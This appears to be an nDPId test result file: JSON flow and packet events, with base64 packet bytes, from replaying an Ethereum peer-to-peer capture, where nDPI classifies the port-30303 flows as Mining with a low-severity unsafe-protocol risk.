00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365751,"flow_last_seen":1578508365751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365751,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1578508365751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365751,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLpXAqAG4I+sl2N1jdl9d8bObAAAAALAC\/\/8KAAAAAgQFtAEDAwUBAQgKItiYsQAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1578508365752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365752,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GqJFOL5ObwKgBuHZf3WHPYyPBMSmbmaAScSA0jAAAAgQFrAQCCApPJ9\/rItiYjAEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1578508365753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365753,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlpnAqAG4Ti+Tm91hdl8xKZuZz2MjwoAQECzEHgAAAQEICiLYmLJPJ9\/r"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365712,"flow_last_seen":1578508365754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1578508365754,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1578508365776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365776,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADsGM5kj6yXYwKgBuHZf3WOqScTQXfGznKAS\/ohykQAAAgQFrAQCCAo1IQWkItiYsQEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1578508365777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365777,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLqHAqAG4I+sl2N1jdl9d8bOcqknE0YAQECyPmwAAAQEICiLYmMg1IQWk"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1583,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365751,"flow_last_seen":1578508365778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":530,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365778,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1586,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1578508365781,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365781,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHjqoAAEARyLjAqAG40WGPAXZfw1AAs7BF2l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1578508365813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365813,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAG8nVeRDeiwKgBuHZf3WKbomHRWAgB9KAScSDEJQAAAgQFrAQCCAppF+qfItiYqQEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1578508365813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365813,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4n3AqAG4XkQ3ot1idl9YCAH0m6Jh0oAQECxToAAAAQEICiLYmOdpF+qf"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365741,"flow_last_seen":1578508365814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365814,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365828,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365828,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGW5bAqAG4DfsOx91mdl9PCwRhAAAAALAC\/\/\/02wAAAgQFtAEDAwUBAQgKItiY9AAAAAAEAgAA"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365846,"flow_last_seen":1578508365846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365846,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1578508365846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365846,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtj\/AqAG4I+SeNN1ndl9FuX9aAAAAALAC\/\/\/dzAAAAgQFtAEDAwUBAQgKItiZBAAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1710,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365852,"flow_last_seen":1578508365852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365852,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1578508365852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365852,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG3OLAqAG4ijsROt1odl\/ttHvbAAAAALAC\/\/9f7QAAAgQFtAEDAwUBAQgKItiZCQAAAAAEAgAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1750,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365885,"flow_last_seen":1578508365885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365885,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1750,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1578508365885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365885,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2crAqAG4z7TO2N1pdl+dzwtmAAAAALAC\/\/8dEQAAAgQFtAEDAwUBAQgKItiZJwAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1578508365813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365813,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAG8nVeRDeiwKgBuHZf3WKbomHRWAgB9KAScSDEJQAAAgQFrAQCCAppF+qfItiYqQEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1578508365813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365813,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4n3AqAG4XkQ3ot1idl9YCAH0m6Jh0oAQECxToAAAAQEICiLYmOdpF+qf"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365741,"flow_last_seen":1578508365814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365814,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365828,"flow_last_seen":1578508365828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365828,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1578508365828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGW5bAqAG4DfsOx91mdl9PCwRhAAAAALAC\/\/\/02wAAAgQFtAEDAwUBAQgKItiY9AAAAAAEAgAA"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365846,"flow_last_seen":1578508365846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365846,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1578508365846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365846,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtj\/AqAG4I+SeNN1ndl9FuX9aAAAAALAC\/\/\/dzAAAAgQFtAEDAwUBAQgKItiZBAAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1710,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365852,"flow_last_seen":1578508365852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365852,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1578508365852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365852,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG3OLAqAG4ijsROt1odl\/ttHvbAAAAALAC\/\/9f7QAAAgQFtAEDAwUBAQgKItiZCQAAAAAEAgAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1750,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365885,"flow_last_seen":1578508365885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365885,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1750,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1578508365885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365885,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2crAqAG4z7TO2N1pdl+dzwtmAAAAALAC\/\/8dEQAAAgQFtAEDAwUBAQgKItiZJwAAAAAEAgAA"}
00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1770,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1578508365899,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1578508365899,"pkt":"KDc3AG3IEBMx8Tl2CABFAACxNvdAACcRcwrKcBxqwKgBuHZfdl8AnfAw9M4wDHlezlLb\/XVAde5xoPK0MYWPqo8wL1hvUi9RDAnTme70\/IGTzT1fYmed3PImx\/QlqjXSlKRDpOJrSqown1EL4xkYxe9gDpH7mkxI5SW3Td37cSNZr69+s5vwesE7AQLyy4RPFs69gun3gnZfoAhIsWiV\/\/bYUAtK\/XBnLAnnp\/ohE29dCVwVPQWUC9vDhF4WIGE="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1578508365903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365903,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGwUMj5J40wKgBuHZf3Weyx8H3Rbl\/W6AS\/ogN9wAAAgQFrAQCCAqAlezxItiZBAEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1578508365903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365903,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtkvAqAG4I+SeNN1ndl9FuX9bssfB+IAQECwq5AAAAQEICiLYmTiAlezx"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1773,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365846,"flow_last_seen":1578508365904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365904,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1578508365903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365903,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGwUMj5J40wKgBuHZf3Weyx8H3Rbl\/W6AS\/ogN9wAAAgQFrAQCCAqAlezxItiZBAEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1578508365903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365903,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtkvAqAG4I+SeNN1ndl9FuX9bssfB+IAQECwq5AAAAQEICiLYmTiAlezx"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1773,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365846,"flow_last_seen":1578508365904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365904,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1578508365919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365919,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc44MAAEARsuTAqAG4p1Z6MnZfdl8AiFGIcmRL\/sJ+HmBFF7n+UfEKJLvDdBgdKzSECJqxpMbuAWJCFnSyz1LOPGHXvK4XvgJfd8y9TVVaoZxiY0SgM1nuu1KcsxmveZ1Iboux45kEq0UHna5hbl98Bua+Zy2zz7pAAAHdBMuEfwAAAYJ2X4J2X8mEp1Z6MoJ2X4CEXhYgYQU="}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1578508365925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365925,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMG5s7PtM7YwKgBuHZf3WknDwC1nc8LZ6AScSCqDAAAAgQFrAQCCApcfI6dItiZJwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1578508365926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365926,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2dbAqAG4z7TO2N1pdl+dzwtnJw8AtoAQECw5oAAAAQEICiLYmUxcfI6d"}
00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365885,"flow_last_seen":1578508365927,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1578508365927,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
